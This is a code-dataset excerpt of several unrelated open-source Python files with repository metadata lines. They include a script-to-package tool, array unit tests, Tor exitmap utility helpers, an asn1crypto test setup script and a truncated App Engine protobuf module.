' See https://www.google.com/recaptcha for more details.',
str,
default_value='Replace me with your recaptcha site key.',
validator=validators.recaptcha_validator),
Entry(
'fireblog.theme',
'Blog theme',
'The theme for this blog.',
str,
default_value='bootstrap',
validator=validators.theme_validator)
)
| gpl-2.0 | 6,351,171,381,094,050,000 | 38.510638 | 79 | 0.623586 | false |
chappers/script2package | example/script2package/script2package/__init__.py | 5 | 3175 | #!/usr/bin/env python
"""script2package: turn a python script into a python package"""
import argparse
import os.path
from script2package import *
def generate_skeleton(script=None, base="package"):
"""Generates a package skeleton within current working directory.
:param script: file path to the script of interest
:param base: name of the base folder for package generation
:param config: setuptools configuration
:param setup_cfg: path to the setup.cfg file
:return: this function returns nothing
"""
import os
from os.path import basename, splitext
from shutil import copyfile, rmtree
if script is None:
print("Script file must be provided within `generate_skeleton`!")
raise
base_script = basename(script)
name, ext = splitext(base_script)
if not ext.endswith("py"):
print("Script file %s does not appear to be a python script!" % script)
raise
# create folder layout
try:
rmtree(base)
except:
pass
os.makedirs('{base}/{name}'.format(base=base, name=name))
# create the setup.py
with open('{base}/setup.py'.format(base=base), 'w') as f:
setup_py = """#!/usr/bin/env python
from setuptools import setup
setup(
setup_requires=['d2to1'],
d2to1=True
)"""
f.write(setup_py)
# copy setup.cfg and readme.md if applicable
# will have to extend to other files in future
if os.path.isfile(os.path.join(os.path.dirname(script), 'setup.cfg')):
copyfile(os.path.join(os.path.dirname(script), 'setup.cfg'),
'{base}/setup.cfg'.format(base=base))
else:
# we have to generate the file
with open('{base}/setup.cfg'.format(base=base), 'w') as f:
setup_cfg = """
[metadata]
name = {name}
""".format(name=name)
f.write(setup_cfg)
if os.path.isfile(os.path.join(os.path.dirname(script), 'readme.md')):
copyfile(os.path.join(os.path.dirname(script), 'readme.md'),
'{base}/readme.md'.format(base=base))
# create __init__.py
with open('{base}/{name}/__init__.py'.format(base=base, name=name), 'w') as f:
f.write("""{script}""".format(script=open(script, 'r').read()))
# create __init__.py: this is redundant but needed for cli tools??
# have to have an option to turn this on or off
with open('{base}/{name}/__main__.py'.format(base=base, name=name), 'w') as f:
f.write("""{script}""".format(script=open(script, 'r').read()))
def main():
"""
`script2package` will correctly treat any `setup.cfg` files which it comes
across.
If it will simply use the default setup settings with the package using
the name of the script as the name of the package. The filename will be
automatically sanitized.
"""
parser = argparse.ArgumentParser()
parser.add_argument('script')
parser.add_argument('--base', action='store', default='package')
args = parser.parse_args()
if args.script is None or not os.path.isfile(args.script):
print("Please enter a valid python script!")
raise
generate_skeleton(args.script, base=args.base)
| mit | -6,684,506,078,431,677,000 | 32.421053 | 82 | 0.64063 | false |
dfroger/dfndarray | test/test_array1d.py | 1 | 3580 | import unittest
from dfndarray import DoubleArray1D, Array1DComputeTestValue
class TestArray1DBase:
"""Tests to pass whatever Array1D allocation method is"""
def test_str(self):
expected_re = "<Array1D of shape \(4\) at 0x\w*>"
s = '%s' % self.a
self.assertRegexpMatches(s, expected_re)
def test_getitem(self):
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a[2], 2.)
self.assertEqual(self.a[3], 3.)
def test_size(self):
self.assertEqual(self.a.n0(), 4)
self.assertEqual(self.a.dim(0), 4)
self.assertEqual(self.a.size(), 4)
def test_out_of_bounds(self):
regexp = "expected 'i0 < m_n0', but got: '10 >= 4'"
self.assertRaisesRegexp(RuntimeError, regexp, self.a.__getitem__,10)
def test_fill(self):
self.a.fill(7)
self.assertEqual(self.a[0], 7.)
self.assertEqual(self.a[1], 7.)
self.assertEqual(self.a[2], 7.)
self.assertEqual(self.a[3], 7.)
def test_resize_equal(self):
self.a.resize(4)
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a[2], 2.)
self.assertEqual(self.a[3], 3.)
self.assertEqual(self.a.n0(), 4)
self.assertEqual(self.a.dim(0), 4)
self.assertEqual(self.a.size(), 4)
def test_resize_less(self):
self.a.resize(2)
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a.n0(), 2)
self.assertEqual(self.a.dim(0), 2)
self.assertEqual(self.a.size(), 2)
def test_resize_greater(self):
self.a.resize(6)
self.assertEqual(self.a[0], 0.)
self.assertEqual(self.a[1], 1.)
self.assertEqual(self.a[2], 2.)
self.assertEqual(self.a[3], 3.)
self.assertEqual(self.a[4], 0.)
self.assertEqual(self.a[5], 0.)
self.assertEqual(self.a.n0(), 6)
self.assertEqual(self.a.dim(0), 6)
self.assertEqual(self.a.size(), 6)
def test_reallocate(self):
self.assertRaises(RuntimeError,self.a.allocate,4)
class TestArray1DAllocateConstructor(unittest.TestCase, TestArray1DBase):
"""Test Array1D allocated in constructor"""
def setUp(self):
self.a = DoubleArray1D(4)
f = Array1DComputeTestValue()
self.a.fill(f)
class TestArray1DAllocateMethod(unittest.TestCase, TestArray1DBase):
"""Test Array1D allocated in constructor method"""
def setUp(self):
self.a = DoubleArray1D()
self.a.allocate(4)
f = Array1DComputeTestValue()
self.a.fill(f)
class TestArray1DAllocateResize(unittest.TestCase, TestArray1DBase):
"""Test Array1D allocated in constructor method"""
def setUp(self):
self.a = DoubleArray1D()
self.a.resize(4)
f = Array1DComputeTestValue()
self.a.fill(f)
class TestArray1DNotAllocated(unittest.TestCase):
def setUp(self):
self.a = DoubleArray1D()
def test_str(self):
expected_re = "<Array1D not allocated>"
s = '%s' % self.a
self.assertRegexpMatches(s, expected_re)
def test_getitem(self):
self.assertRaises(RuntimeError,self.a.__getitem__,0)
def test_size(self):
self.assertEqual(self.a.n0(), 0)
self.assertEqual(self.a.dim(0), 0)
self.assertEqual(self.a.size(), 0)
def test_fill(self):
self.assertRaises(RuntimeError,self.a.fill,7)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 2,419,825,719,442,931,000 | 28.105691 | 76 | 0.607821 | false |
thylong/exitmap | src/util.py | 1 | 5849 | # Copyright 2013-2015 Philipp Winter <[email protected]>
#
# This file is part of exitmap.
#
# exitmap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# exitmap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with exitmap. If not, see <http://www.gnu.org/licenses/>.
"""
Provides utility functions.
"""
import os
import re
import urllib2
import json
import tempfile
import errno
from stem.descriptor.reader import DescriptorReader
import log
logger = log.get_logger()
# Holds the directory to which we can write temporary analysis results.
analysis_dir = None
def parse_log_lines(ports, log_line):
"""
Extract the SOCKS and control port from Tor's log output.
Both ports are written to the given dictionary.
"""
logger.debug("Tor says: %s" % log_line)
if re.search(r"^.*Bootstrapped \d+%.*$", log_line):
logger.info(re.sub(r"^.*(Bootstrapped \d+%.*)$", r"Tor \1", log_line))
socks_pattern = "Socks listener listening on port ([0-9]{1,5})."
control_pattern = "Control listener listening on port ([0-9]{1,5})."
match = re.search(socks_pattern, log_line)
if match:
ports["socks"] = int(match.group(1))
logger.debug("Tor uses port %d as SOCKS port." % ports["socks"])
match = re.search(control_pattern, log_line)
if match:
ports["control"] = int(match.group(1))
logger.debug("Tor uses port %d as control port." % ports["control"])
def relay_in_consensus(fingerprint, cached_consensus_path):
"""
Check if a relay is part of the consensus.
If the relay identified by `fingerprint' is part of the given `consensus',
True is returned. If not, False is returned.
"""
fingerprint = fingerprint.upper()
with DescriptorReader(cached_consensus_path) as reader:
for descriptor in reader:
if descriptor.fingerprint == fingerprint:
return True
return False
def get_source_port(stream_line):
"""
Extract the source port from a stream event.
"""
pattern = "SOURCE_ADDR=[0-9\.]{7,15}:([0-9]{1,5})"
match = re.search(pattern, stream_line)
if match:
return int(match.group(1))
return None
def extract_pattern(line, pattern):
"""
Look for the given 'pattern' in 'line'.
If it is found, the match is returned. Otherwise, 'None' is returned.
"""
match = re.search(pattern, line)
if match:
return match.group(1)
return None
def get_relays_in_country(country_code):
"""
Return a list of the fingerprint of all relays in the given country code.
The fingerprints are obtained by querying Onionoo. In case of an error, an
empty list is returned.
"""
country_code = country_code.lower()
onionoo_url = "https://onionoo.torproject.org/details?country="
logger.info("Attempting to fetch all relays with country code \"%s\" "
"from Onionoo." % country_code)
try:
data = urllib2.urlopen("%s%s" % (onionoo_url, country_code)).read()
except Exception as err:
logger.warning("urlopen() failed: %s" % err)
return []
try:
response = json.loads(data)
except ValueError as err:
logger.warning("json.loads() failed: %s" % err)
return []
fingerprints = [desc["fingerprint"] for desc in response["relays"]]
logger.info("Onionoo gave us %d (exit and non-exit) fingerprints." %
len(fingerprints))
return fingerprints
def exiturl(exit_fpr):
"""
Return an Atlas link for the exit relay fingerprint.
"""
return "<https://atlas.torproject.org/#details/%s>" % exit_fpr
def dump_to_file(blurb, exit_fpr):
"""
Dump the given blurb to a randomly generated file which contains exit_fpr.
This function is useful to save data obtained from bad exit relays to file
for later analysis.
"""
try:
os.makedirs(analysis_dir)
except OSError as err:
if err.errno != errno.EEXIST:
raise
if analysis_dir is None:
fd, file_name = tempfile.mkstemp(prefix="%s_" % exit_fpr)
else:
fd, file_name = tempfile.mkstemp(prefix="%s_" % exit_fpr,
dir=analysis_dir)
try:
with open(file_name, "w") as fd:
fd.write(blurb)
except IOError as err:
logger.warning("Couldn't write to \"%s\": %s" % (file_name, err))
return None
logger.debug("Wrote %d-length blurb to file \"%s\"." %
(len(blurb), file_name))
return file_name
def new_request(url, data=None):
"""
Return a request object whose HTTP header resembles TorBrowser.
"""
request = urllib2.Request(url, data)
# Try to resemble the HTTP request of TorBrowser as closely as possible.
# Note that the order of header fields is also relevant but urllib2 uses a
# dictionary for headers, which is orderless.
request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1; rv:31.0) "
"Gecko/20100101 Firefox/31.0")
request.add_header("Accept", "text/html,application/xhtml+xml,"
"application/xml;q=0.9,*/*;q=0.8")
request.add_header("Accept-Language", "en-us,en;q=0.5")
request.add_header("Accept-Encoding", "gzip, deflate")
request.add_header("Connection", "keep-alive")
return request
| gpl-3.0 | 8,049,871,103,180,259,000 | 27.256039 | 79 | 0.637716 | false |
wbond/asn1crypto | tests/setup.py | 1 | 4750 | import codecs
import os
import shutil
import sys
import warnings
import setuptools
from setuptools import setup, Command
from setuptools.command.egg_info import egg_info
PACKAGE_NAME = 'asn1crypto'
PACKAGE_VERSION = '1.4.0'
TEST_PACKAGE_NAME = '%s_tests' % PACKAGE_NAME
TESTS_ROOT = os.path.dirname(os.path.abspath(__file__))
# setuptools 38.6.0 and newer know about long_description_content_type, but
# distutils still complains about it, so silence the warning
sv = setuptools.__version__
svi = tuple(int(o) if o.isdigit() else o for o in sv.split('.'))
if svi >= (38, 6):
warnings.filterwarnings(
'ignore',
"Unknown distribution option: 'long_description_content_type'",
module='distutils.dist'
)
# Older versions of distutils would take a glob pattern and return dirs
# and then would complain that it couldn't copy a dir like a file, so we
# have to build an explicit list of file names
data_files = []
fixtures_dir = os.path.join(TESTS_ROOT, 'fixtures')
for root, dirs, files in os.walk(fixtures_dir):
for filename in files:
data_files.append(os.path.join(root, filename)[len(TESTS_ROOT) + 1:])
package_data = {
TEST_PACKAGE_NAME: data_files
}
# This allows us to send the LICENSE when creating a sdist. Wheels
# automatically include the license, and don't need the docs. For these
# to be included, the command must be "python setup.py sdist".
if sys.argv[1:] == ['sdist'] or sorted(sys.argv[1:]) == ['-q', 'sdist']:
package_data[TEST_PACKAGE_NAME].extend([
'LICENSE',
'readme.md',
])
# Ensures a copy of the LICENSE is included with the egg-info for
# install and bdist_egg commands
class EggInfoCommand(egg_info):
def run(self):
egg_info_path = os.path.join(
TESTS_ROOT,
'%s.egg-info' % TEST_PACKAGE_NAME
)
if not os.path.exists(egg_info_path):
os.mkdir(egg_info_path)
shutil.copy2(
os.path.join(TESTS_ROOT, 'LICENSE'),
os.path.join(egg_info_path, 'LICENSE')
)
egg_info.run(self)
class CleanCommand(Command):
user_options = [
('all', 'a', '(Compatibility with original clean command)'),
]
def initialize_options(self):
self.all = False
def finalize_options(self):
pass
def run(self):
sub_folders = ['build', 'temp', '%s.egg-info' % TEST_PACKAGE_NAME]
if self.all:
sub_folders.append('dist')
for sub_folder in sub_folders:
full_path = os.path.join(TESTS_ROOT, sub_folder)
if os.path.exists(full_path):
shutil.rmtree(full_path)
for root, dirs, files in os.walk(TESTS_ROOT):
for filename in files:
if filename[-4:] == '.pyc':
os.unlink(os.path.join(root, filename))
for dirname in list(dirs):
if dirname == '__pycache__':
shutil.rmtree(os.path.join(root, dirname))
readme = ''
with codecs.open(os.path.join(TESTS_ROOT, 'readme.md'), 'r', 'utf-8') as f:
readme = f.read()
setup(
name=TEST_PACKAGE_NAME,
version=PACKAGE_VERSION,
description=(
'Test suite for asn1crypto, separated due to file size'
),
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/wbond/asn1crypto',
author='wbond',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Security :: Cryptography',
],
keywords='asn1 crypto pki x509 certificate rsa dsa ec dh',
packages=[TEST_PACKAGE_NAME],
package_dir={TEST_PACKAGE_NAME: '.'},
package_data=package_data,
install_requires=[
'%s==%s' % (PACKAGE_NAME, PACKAGE_VERSION),
],
cmdclass={
'clean': CleanCommand,
'egg_info': EggInfoCommand,
}
)
| mit | 5,509,437,058,154,964,000 | 29.448718 | 77 | 0.613053 | false |
undoware/neutron-drive | google_appengine/google/appengine/api/files/file_service_pb.py | 12 | 146256 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
_extension_runtime = True
_ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
_extension_runtime = False
_ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage
from google.appengine.api.api_base_pb import *
import google.appengine.api.api_base_pb
class FileServiceErrors(ProtocolBuffer.ProtocolMessage):
OK = 0
API_TEMPORARILY_UNAVAILABLE = 1
REQUEST_TOO_LARGE = 3
RESPONSE_TOO_LARGE = 4
INVALID_FILE_NAME = 5
OPERATION_NOT_SUPPORTED = 6
IO_ERROR = 7
PERMISSION_DENIED = 8
WRONG_CONTENT_TYPE = 9
FILE_NOT_OPENED = 10
WRONG_OPEN_MODE = 11
EXCLUSIVE_LOCK_REQUIRED = 12
FILE_TEMPORARILY_UNAVAILABLE = 13
EXISTENCE_ERROR = 100
FINALIZATION_ERROR = 101
UNSUPPORTED_CONTENT_TYPE = 102
READ_ONLY = 103
EXCLUSIVE_LOCK_FAILED = 104
EXISTENCE_ERROR_METADATA_NOT_FOUND = 105
EXISTENCE_ERROR_METADATA_FOUND = 106
EXISTENCE_ERROR_SHARDING_MISMATCH = 107
FINALIZATION_IN_PROGRESS = 108
EXISTENCE_ERROR_OBJECT_NOT_FOUND = 109
EXISTENCE_ERROR_BUCKET_NOT_FOUND = 110
SEQUENCE_KEY_OUT_OF_ORDER = 300
OUT_OF_BOUNDS = 500
GLOBS_NOT_SUPPORTED = 600
FILE_NAME_NOT_SPECIFIED = 701
FILE_NAME_SPECIFIED = 702
FILE_ALREADY_EXISTS = 703
UNSUPPORTED_FILE_SYSTEM = 704
INVALID_PARAMETER = 705
SHUFFLER_INTERNAL_ERROR = 800
SHUFFLE_REQUEST_TOO_LARGE = 801
DUPLICATE_SHUFFLE_NAME = 802
SHUFFLE_NOT_AVAILABLE = 803
SHUFFLER_TEMPORARILY_UNAVAILABLE = 900
MAX_ERROR_CODE = 9999
_ErrorCode_NAMES = {
0: "OK",
1: "API_TEMPORARILY_UNAVAILABLE",
3: "REQUEST_TOO_LARGE",
4: "RESPONSE_TOO_LARGE",
5: "INVALID_FILE_NAME",
6: "OPERATION_NOT_SUPPORTED",
7: "IO_ERROR",
8: "PERMISSION_DENIED",
9: "WRONG_CONTENT_TYPE",
10: "FILE_NOT_OPENED",
11: "WRONG_OPEN_MODE",
12: "EXCLUSIVE_LOCK_REQUIRED",
13: "FILE_TEMPORARILY_UNAVAILABLE",
100: "EXISTENCE_ERROR",
101: "FINALIZATION_ERROR",
102: "UNSUPPORTED_CONTENT_TYPE",
103: "READ_ONLY",
104: "EXCLUSIVE_LOCK_FAILED",
105: "EXISTENCE_ERROR_METADATA_NOT_FOUND",
106: "EXISTENCE_ERROR_METADATA_FOUND",
107: "EXISTENCE_ERROR_SHARDING_MISMATCH",
108: "FINALIZATION_IN_PROGRESS",
109: "EXISTENCE_ERROR_OBJECT_NOT_FOUND",
110: "EXISTENCE_ERROR_BUCKET_NOT_FOUND",
300: "SEQUENCE_KEY_OUT_OF_ORDER",
500: "OUT_OF_BOUNDS",
600: "GLOBS_NOT_SUPPORTED",
701: "FILE_NAME_NOT_SPECIFIED",
702: "FILE_NAME_SPECIFIED",
703: "FILE_ALREADY_EXISTS",
704: "UNSUPPORTED_FILE_SYSTEM",
705: "INVALID_PARAMETER",
800: "SHUFFLER_INTERNAL_ERROR",
801: "SHUFFLE_REQUEST_TOO_LARGE",
802: "DUPLICATE_SHUFFLE_NAME",
803: "SHUFFLE_NOT_AVAILABLE",
900: "SHUFFLER_TEMPORARILY_UNAVAILABLE",
9999: "MAX_ERROR_CODE",
}
def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
ErrorCode_Name = classmethod(ErrorCode_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FileServiceErrors'
class KeyValue(ProtocolBuffer.ProtocolMessage):
has_key_ = 0
key_ = ""
has_value_ = 0
value_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def key(self): return self.key_
def set_key(self, x):
self.has_key_ = 1
self.key_ = x
def clear_key(self):
if self.has_key_:
self.has_key_ = 0
self.key_ = ""
def has_key(self): return self.has_key_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def MergeFrom(self, x):
assert x is not self
if (x.has_key()): self.set_key(x.key())
if (x.has_value()): self.set_value(x.value())
def Equals(self, x):
if x is self: return 1
if self.has_key_ != x.has_key_: return 0
if self.has_key_ and self.key_ != x.key_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: key not set.')
if (not self.has_value_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: value not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.key_))
n += self.lengthString(len(self.value_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_key_):
n += 1
n += self.lengthString(len(self.key_))
if (self.has_value_):
n += 1
n += self.lengthString(len(self.value_))
return n
def Clear(self):
self.clear_key()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def OutputPartial(self, out):
if (self.has_key_):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_key(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_key_: res+=prefix+("key: %s\n" % self.DebugFormatString(self.key_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kkey = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "key",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.KeyValue'
class KeyValues(ProtocolBuffer.ProtocolMessage):
has_key_ = 0
key_ = ""
has_partial_ = 0
partial_ = 0
def __init__(self, contents=None):
self.value_ = []
if contents is not None: self.MergeFromString(contents)
def key(self): return self.key_
def set_key(self, x):
self.has_key_ = 1
self.key_ = x
def clear_key(self):
if self.has_key_:
self.has_key_ = 0
self.key_ = ""
def has_key(self): return self.has_key_
def value_size(self): return len(self.value_)
def value_list(self): return self.value_
def value(self, i):
return self.value_[i]
def set_value(self, i, x):
self.value_[i] = x
def add_value(self, x):
self.value_.append(x)
def clear_value(self):
self.value_ = []
def partial(self): return self.partial_
def set_partial(self, x):
self.has_partial_ = 1
self.partial_ = x
def clear_partial(self):
if self.has_partial_:
self.has_partial_ = 0
self.partial_ = 0
def has_partial(self): return self.has_partial_
def MergeFrom(self, x):
assert x is not self
if (x.has_key()): self.set_key(x.key())
for i in xrange(x.value_size()): self.add_value(x.value(i))
if (x.has_partial()): self.set_partial(x.partial())
def Equals(self, x):
if x is self: return 1
if self.has_key_ != x.has_key_: return 0
if self.has_key_ and self.key_ != x.key_: return 0
if len(self.value_) != len(x.value_): return 0
for e1, e2 in zip(self.value_, x.value_):
if e1 != e2: return 0
if self.has_partial_ != x.has_partial_: return 0
if self.has_partial_ and self.partial_ != x.partial_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: key not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.key_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(len(self.value_[i]))
if (self.has_partial_): n += 2
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_key_):
n += 1
n += self.lengthString(len(self.key_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(len(self.value_[i]))
if (self.has_partial_): n += 2
return n
def Clear(self):
self.clear_key()
self.clear_value()
self.clear_partial()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putPrefixedString(self.value_[i])
if (self.has_partial_):
out.putVarInt32(24)
out.putBoolean(self.partial_)
def OutputPartial(self, out):
if (self.has_key_):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putPrefixedString(self.value_[i])
if (self.has_partial_):
out.putVarInt32(24)
out.putBoolean(self.partial_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_key(d.getPrefixedString())
continue
if tt == 18:
self.add_value(d.getPrefixedString())
continue
if tt == 24:
self.set_partial(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_key_: res+=prefix+("key: %s\n" % self.DebugFormatString(self.key_))
cnt=0
for e in self.value_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("value%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
if self.has_partial_: res+=prefix+("partial: %s\n" % self.DebugFormatBool(self.partial_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kkey = 1
kvalue = 2
kpartial = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "key",
2: "value",
3: "partial",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.KeyValues'
class FileContentType(ProtocolBuffer.ProtocolMessage):
RAW = 0
DEPRECATED_1 = 2
INVALID_TYPE = 127
_ContentType_NAMES = {
0: "RAW",
2: "DEPRECATED_1",
127: "INVALID_TYPE",
}
def ContentType_Name(cls, x): return cls._ContentType_NAMES.get(x, "")
ContentType_Name = classmethod(ContentType_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FileContentType'
class CreateRequest_Parameter(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_value_ = 0
value_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_value()): self.set_value(x.value())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (not self.has_value_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: value not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += self.lengthString(len(self.value_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_value_):
n += 1
n += self.lengthString(len(self.value_))
return n
def Clear(self):
self.clear_name()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def TryMerge(self, d):
while d.avail() > 0:
